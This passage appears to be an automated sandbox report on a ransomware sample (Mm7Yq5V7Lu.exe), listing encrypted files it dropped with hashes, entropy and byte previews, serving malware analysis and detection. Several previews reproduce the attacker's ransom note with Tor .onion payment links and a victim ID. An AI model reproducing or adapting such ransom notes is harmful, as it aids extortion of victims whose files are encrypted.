                                                                                                                                                      Preview: wv.:P..Mi........{;$..>.O.../..HwAin.(%.C].j..j..@$.W]..UV/....h........C..7...O..S.7./.z.s.~.....d..J.x.FP.U..._k....;.2..@&n..)v6...^cL.J&....l.....m.NT~2MM..../Dso...D.K.H..KUx.'rl..m..@..T...L..B.-.......VF.sX.O...J/G..|.......k."c.8...orn..fF.eh...."f...?M...2.Eg.}..*.pG..]..\2].K.Z.R.e...GnR.......x..o 9....s..*...6.....|E.%...o.-..T>....H..c>_"bY].p..'^.......og...5....B0.$....eq...,...FNB.hj.0=.5...|...`.#.o%.SG=U..i<.x.O.....|....._T...1...|.........H....~...C%x^r.'n..40Z9Xc.,.a..%.SnZ.|..ld.[._Z&Q.o=.|._..l%.W.Ru..C.......6.<q..1.vY.Z.3<.....[H.2n...IG.[.....z.......f5;f.q.E.*7x.Q4J.q...F.....l..5,.1........=..i..&....`..$?y.DV.|...b...G7,....Zvy....3&\#....%..4.O.....7J}.y.#.p.I....\.:......i...N...x.&.*.xR.R...c.y.1.X..>F[#...?..^.?.....x`3.l..FS.g..+I....z..k.&...&.....tA...m.F.. i...p...Ol.LR-sF..5..D..GY..1./.[._]O._.D..;.&...|.Eh...4.@k..i`..R_!N3...._..n.Q.m..`..x.8......i.`...DO..I[.4.{P.....,.B..bpKf......H......:
                                                                                                                                                      C:\Users\user\My Documents\PALRGUCVEH.mp3.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.004304278821183
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:Irw7LT5lLMyocrLo/+Ucxac9y/zCwgck38o:kwfT7toT/cxac9uzTEL
                                                                                                                                                      MD5:2A5F11B1FE9BC74B46B432C5CFC04456
                                                                                                                                                      SHA1:6752123968674EE1B262C2B67E24596720773E64
                                                                                                                                                      SHA-256:70D49BE1B958A4A0CED6EAC51382F378308E9BE5692AA53142F0B48C242546EF
                                                                                                                                                      SHA-512:F2B3AF3768FD8C3191664AE47F34C095B5838D94C7B80C859992AC1AB0C189F59E9AB764F6AC15D3480788301ACFE281683D098A3DD784DDF9FB08C1A146954E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: /..s..L|.....rj.%.8eyKe5.,....+ezD.@....c....,..9...E.w.h..~:..%h3V^r.....G/.f..'.&...CBB....o.mQ.. .&Z...>..^...:.9.)._.d....i..>'.W...cF.SY......b.3#.E8..vP.[.(.mm.IX._wBv.3.s1t...;..%....}fE..g....R[Z..<(.M..JI*&>.............^.{'.i.oL.YA........S.brl]S..6+....\.....hCG.;*W.UV..?{...d...H<.F..1~..l"..S.(`.&%..f.JA....}...lj.3..Lgh)..d........Xk..m......S\X...O..^e..l-.....lJq...Bi&u...QW ......C.~hV..!.."..~.:w.R}.r.}...0.....j.......W"}...9CM..h.UU&F.......S..8L...E....:s{..Cf/...V.J....d...D.m<.g!/...H.b.k_|...Z.......8.._.10W'..).....x&#.I..D........T.'Cf..K._..!.W....}....y7#.....%..1E......{.....N.z....F7............q.6..mI!.j...v_....?i!..1......~{6..Z..Z5....g..k ../P.....KK..o,.W.b.a...$..n.....R....X.YL.Kg.S]u....2...*.....zvaCl{..jbq.v|...K.....7..i......K....Z.......q...\.[vj .2.[.|...U..`V..5u@.............u.Z<...7.p......h......Q=6LC......r...y.`.....y8.s.bXa......+)T........x.&.'....R.O...5.....0RU.5v......CS.'...r.
                                                                                                                                                      C:\Users\user\My Documents\PALRGUCVEH.pdf.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.003924758281818
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:FFp2O7/Ir3hFNHU0tCsLLOizCwgck384U:pvIjh1tbnzTENU
                                                                                                                                                      MD5:06E2AB2FDFA3EC69EEFBCED80C6E4E61
                                                                                                                                                      SHA1:8D45C42E88CB7E5C34E5D099B2A6D2534A525E5F
                                                                                                                                                      SHA-256:5587E4EBB7BB086877E73E228BFF9C4B12066090E88D0FFC96AD5272E2C90C60
                                                                                                                                                      SHA-512:0FFE6B4C9644182B9B05FE9EF39850EF465EE563748435E5A865B7A057EE5A4DD36A1640446631CB8717F1EF955D969724E34814171AD1EC0F0045F10AC8C667
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .$>%..R.l...dA[.b.@.w..Y.....d.Q.k.h.Y....Rd...+..EU..2R~..\.L..y...j~\..cF........B,L.....I..^.-O.e..u..]Z....?...d/,k.y.B.|.&..ssC.[.3..g.u...#.}...g.`.P.B.9..>H.%)..!]?.|5..+n. wK7...:.3e.M.)%....3[.BKH6+...f..Y..{~._.r..... ..1.,.....#A...%.......^.D.<x.,.;o).U.U}k&a....V..D.&..W._DB_.....r+aUT"..9..\z..1..(....{.W..&.W...,Y.B..>x.Yd._.|...d.N.N./~|.*.L...P...Ow..(...M'...-/.\.-...$1.]...y.[....MhX...*...4Eq..@..x.b.Z.P2....~nlOz@.Ad(.8(j.....!.$.....#.!6;.{8.>.>.z@.....U"Bfa......h9..#z.L..7=._.p...AK.Y.>.k7..0....Y..C.!}...J..|u.?..]..?.c..4...].VZ!...,8..M.s..8.*.@U..;....tR@.A!\]9.....&q.B.H..0-i<.tdc....z..E...r....{.Ai..D.0.G.4..a..1...@z....1.."oP..Y.).....&r...y.A.W`V.....mR...j.GUd......./>..n.1...H.)..sO...*...<.pPA..} 3R..ah.<.Z.q....4-..ra...+..+.....|......d..:.q.....P.8Cqdc.H.IXv....$....~n.....M."|....];..I...>U...S)..~.c.....<......".bZ..d..=?.s.mIx.X...9.!.G..y..s.1..f?0..0.t.s.V=].3...S....c..+@=.)=.>."p...L..d.f.....L"..
                                                                                                                                                      C:\Users\user\My Documents\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1360
                                                                                                                                                      Entropy (8bit):6.24899007980337
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:XUrLnhSHcw/zxxzWktfMmSiozK8sevWAVgKTaCB7RZ0cHYIgtyUzA:XUr7qcwLxxtMmS7zCwgck38h
                                                                                                                                                      MD5:D69E8FF1EC9FC737211FDDF6C3282155
                                                                                                                                                      SHA1:6B220843AF06140E541ABDA5F409A9D368DCE20C
                                                                                                                                                      SHA-256:344EE367C7BC0270B6E4F8BC93EC1031CE334BBC1EC9A619649D0351299B1535
                                                                                                                                                      SHA-512:A011EA43277F4A4964BFDA5916D11F35B8B38F5D8B928EC8C54EE199BD604B8CB1E47148ED9D09EA48815ED766757116D21BDECDCB8728DE33D4AEE435037BC9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .yw:MA..'...A.t.b.z...2.'...=.e.?......q.X....0zz]0V..._6....i.N..0Q.fM.%`...WJ ...rk....qK.w.z%gs.9!.bFt.m{(c.U....u3.J..,....<KX.rM..fo..*....L.c.b...[.q...._../.")>.}|......s(M..P...._#.....+.h..u.g..ip.{.....[..6...P"..|l|..0L..Lua...5...............5...i7..c..Z<.$lO..C..-.k)..n._8..c&....`{...9xS.....g.N..}o)..$.r~..[..@i../.....5...7...W..wTP....... ..xZ.uh.i..Y....X.z....t..]!...ZP!.T.4.'9.3c....%g.'..,.c.<..>...W....... ..(...*c.L.G.......k<\.{@V...s.........aD..Vr......*(c.q...m...z.bS..}Y..B.k.1tn.U.s67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4
                                                                                                                                                      C:\Users\user\Pictures\Camera Roll\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1136
                                                                                                                                                      Entropy (8bit):5.616408358783853
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:elFOM/r7bL4zK8sevWAVgKTaCB7RZ0cHYIgtyUzaeQitr:elFOM/r7bEzCwgck38J8
                                                                                                                                                      MD5:AA5737DE34988AC0EA9096355792220E
                                                                                                                                                      SHA1:2F8F50A1F000AC3E7B6E3608B2DD2452DBA045D7
                                                                                                                                                      SHA-256:527EA96CBC9C0C2CBFB31D5570F4380DBC9DD797B3783EB1C1C257F7E826D457
                                                                                                                                                      SHA-512:3E9C3147393313E287EB599BBCA2B83A1466B48DE37866B1A8B7497F417ABC076FF60F98CF5FE9D2E8C90434C20A196AF2294661988C1544B75564E4680CC8BE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....V.\.(. Y.N.v1.y....V..Ez3y.....h...;^"...H>.18)...`...Dc)X...w..~..0k6.[..Mc.y.6-....*.}uB.).....&d.B.y. T1...K.W..$LC]}...1j.V(_...A...8.....*...K..MvLg.rE.-.......L...\...Kq....3."..C,5.].8. .F..i....75......fB...g....<....%5..[x.G.g..I5..T`...p.q..........&F..n..Dn...0>...g...c#...B]#hSp..J.|...>...!67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64
                                                                                                                                                      C:\Users\user\Pictures\Camera Roll\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1136
                                                                                                                                                      Entropy (8bit):5.616408358783853
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:elFOM/r7bL4zK8sevWAVgKTaCB7RZ0cHYIgtyUzaeQitr:elFOM/r7bEzCwgck38J8
                                                                                                                                                      MD5:AA5737DE34988AC0EA9096355792220E
                                                                                                                                                      SHA1:2F8F50A1F000AC3E7B6E3608B2DD2452DBA045D7
                                                                                                                                                      SHA-256:527EA96CBC9C0C2CBFB31D5570F4380DBC9DD797B3783EB1C1C257F7E826D457
                                                                                                                                                      SHA-512:3E9C3147393313E287EB599BBCA2B83A1466B48DE37866B1A8B7497F417ABC076FF60F98CF5FE9D2E8C90434C20A196AF2294661988C1544B75564E4680CC8BE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....V.\.(. Y.N.v1.y....V..Ez3y.....h...;^"...H>.18)...`...Dc)X...w..~..0k6.[..Mc.y.6-....*.}uB.).....&d.B.y. T1...K.W..$LC]}...1j.V(_...A...8.....*...K..MvLg.rE.-.......L...\...Kq....3."..C,5.].8. .F..i....75......fB...g....<....%5..[x.G.g..I5..T`...p.q..........&F..n..Dn...0>...g...c#...B]#hSp..J.|...>...!67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64
                                                                                                                                                      C:\Users\user\Pictures\Camera Roll\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\Pictures\desktop.ini
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1456
                                                                                                                                                      Entropy (8bit):6.446008251619623
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:9VfwOwB6ZD8x4wSEP0ZkqKKfWxzK8sevWAVgKTaCB7RZ0cHYIgtyUzUK:rwOwTh0aMIzCwgck38rK
                                                                                                                                                      MD5:089DAE9C0093B8975C783AB5F2A75512
                                                                                                                                                      SHA1:C86AF3CB5B0C651808896F4DA373C368871819A7
                                                                                                                                                      SHA-256:7E21B1DA5F169F875281D31648711295DD70D2ADE89DC0851AEB5F150E670A47
                                                                                                                                                      SHA-512:BF61F4164AF7D3956F498ADEC2F433A2D5847CBB853C00762132A88521776CB614BB27669D76C3312F113B964D6FB86C431DC42A57329DBB77434471FC65C4A7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....?-G.E....[...o....r..U..Hn...L......m ._#...R..y.h...V+4....p....._8.u.N......x.r.|.LL.).$..../..v.f...3b...[.1..).)pR*i..|y.!...Cp..........I.!*....}+lt..f..B..l1.n.qN..%..~;......`...e....a...!.#<.s'-y.'X..6..EE.X.\.Z.Aqn.....t.'.Le....\.....;....p.....(...9..Z..D....M-../F.......c..0~..\.n......]#....{.. H&Dp.....[.*...?.t...ia..V..F,........s.o....z.z...v7..?...."=.Ue9^.).L.i;.j..Q...)..I...5...b.....Tt.~...[.S.....%iW..U^....}G|......H.i}..i...H..,.X..f.~...].<....n..?7...>....1..%.X..}..3.)..Z.O..\.m..y..r\....t.v.`...%Ec.r..^...`^O...n..>~.Y.].7A6...5.M....^..zA}...d/,..b...a..~..;..F.d..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A
                                                                                                                                                      C:\Users\user\Pictures\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1456
                                                                                                                                                      Entropy (8bit):6.446008251619623
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:9VfwOwB6ZD8x4wSEP0ZkqKKfWxzK8sevWAVgKTaCB7RZ0cHYIgtyUzUK:rwOwTh0aMIzCwgck38rK
                                                                                                                                                      MD5:089DAE9C0093B8975C783AB5F2A75512
                                                                                                                                                      SHA1:C86AF3CB5B0C651808896F4DA373C368871819A7
                                                                                                                                                      SHA-256:7E21B1DA5F169F875281D31648711295DD70D2ADE89DC0851AEB5F150E670A47
                                                                                                                                                      SHA-512:BF61F4164AF7D3956F498ADEC2F433A2D5847CBB853C00762132A88521776CB614BB27669D76C3312F113B964D6FB86C431DC42A57329DBB77434471FC65C4A7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....?-G.E....[...o....r..U..Hn...L......m ._#...R..y.h...V+4....p....._8.u.N......x.r.|.LL.).$..../..v.f...3b...[.1..).)pR*i..|y.!...Cp..........I.!*....}+lt..f..B..l1.n.qN..%..~;......`...e....a...!.#<.s'-y.'X..6..EE.X.\.Z.Aqn.....t.'.Le....\.....;....p.....(...9..Z..D....M-../F.......c..0~..\.n......]#....{.. H&Dp.....[.*...?.t...ia..V..F,........s.o....z.z...v7..?...."=.Ue9^.).L.i;.j..Q...)..I...5...b.....Tt.~...[.S.....%iW..U^....}G|......H.i}..i...H..,.X..f.~...].<....n..?7...>....1..%.X..}..3.)..Z.O..\.m..y..r\....t.v.`...%Ec.r..^...`^O...n..>~.Y.].7A6...5.M....^..zA}...d/,..b...a..~..;..F.d..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A
                                                                                                                                                      C:\Users\user\Pictures\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\Saved Games\desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1232
                                                                                                                                                      Entropy (8bit):5.928195404586467
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:l/QvfxG62FFrUCF5iY0DBgzK8sevWAVgKTaCB7RZ0cHYIgtyUzHx:lIv862DI6iYSBgzCwgck38M
                                                                                                                                                      MD5:185CF0069B7A240C47F3A94D61EE7C12
                                                                                                                                                      SHA1:FBDA04603A20F8C4BFFC648947561F2C06EA8A49
                                                                                                                                                      SHA-256:4125A1E9BCA79AA6B27FD1E336E79ED45C1B0B5E9BDF9355675598FA413239C4
                                                                                                                                                      SHA-512:35D60BAA584692565219C11BC99BE765F7AE386ACC36199F620C52C6FFCCA1DD2004CFD4EC59F4F0056ECFCC054B93670450914AA017F0897D3354A45D968E29
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...X..P...*..].F<.....X.?F2xYLRb:.~. .7Z.=....8V34C....7.....o8'V....6..\.....Q.....%pO..........v..K].f..*...........2u.1-.....J.G.nI,...o.<;].?.4.r..m....?..3..R,$...=.f'._..I.,...H.0f.....K...5..>..^Z.Z..b......[B......../H..........N..8e..6Jup.P............n..R.7 ...{..u.....T)%L.U.#.M......>!.O0..ps.f.9;^.m0.........PO..|....D3.YLE.&.p...H...X...w.{..........}..J..r.o..cz..i.1=Al.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC
                                                                                                                                                      C:\Users\user\Saved Games\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1232
                                                                                                                                                      Entropy (8bit):5.928195404586467
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:l/QvfxG62FFrUCF5iY0DBgzK8sevWAVgKTaCB7RZ0cHYIgtyUzHx:lIv862DI6iYSBgzCwgck38M
                                                                                                                                                      MD5:185CF0069B7A240C47F3A94D61EE7C12
                                                                                                                                                      SHA1:FBDA04603A20F8C4BFFC648947561F2C06EA8A49
                                                                                                                                                      SHA-256:4125A1E9BCA79AA6B27FD1E336E79ED45C1B0B5E9BDF9355675598FA413239C4
                                                                                                                                                      SHA-512:35D60BAA584692565219C11BC99BE765F7AE386ACC36199F620C52C6FFCCA1DD2004CFD4EC59F4F0056ECFCC054B93670450914AA017F0897D3354A45D968E29
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...X..P...*..].F<.....X.?F2xYLRb:.~. .7Z.=....8V34C....7.....o8'V....6..\.....Q.....%pO..........v..K].f..*...........2u.1-.....J.G.nI,...o.<;].?.4.r..m....?..3..R,$...=.f'._..I.,...H.0f.....K...5..>..^Z.Z..b......[B......../H..........N..8e..6Jup.P............n..R.7 ...{..u.....T)%L.U.#.M......>!.O0..ps.f.9;^.m0.........PO..|....D3.YLE.&.p...H...X...w.{..........}..J..r.o..cz..i.1=Al.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC
                                                                                                                                                      C:\Users\user\Saved Games\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
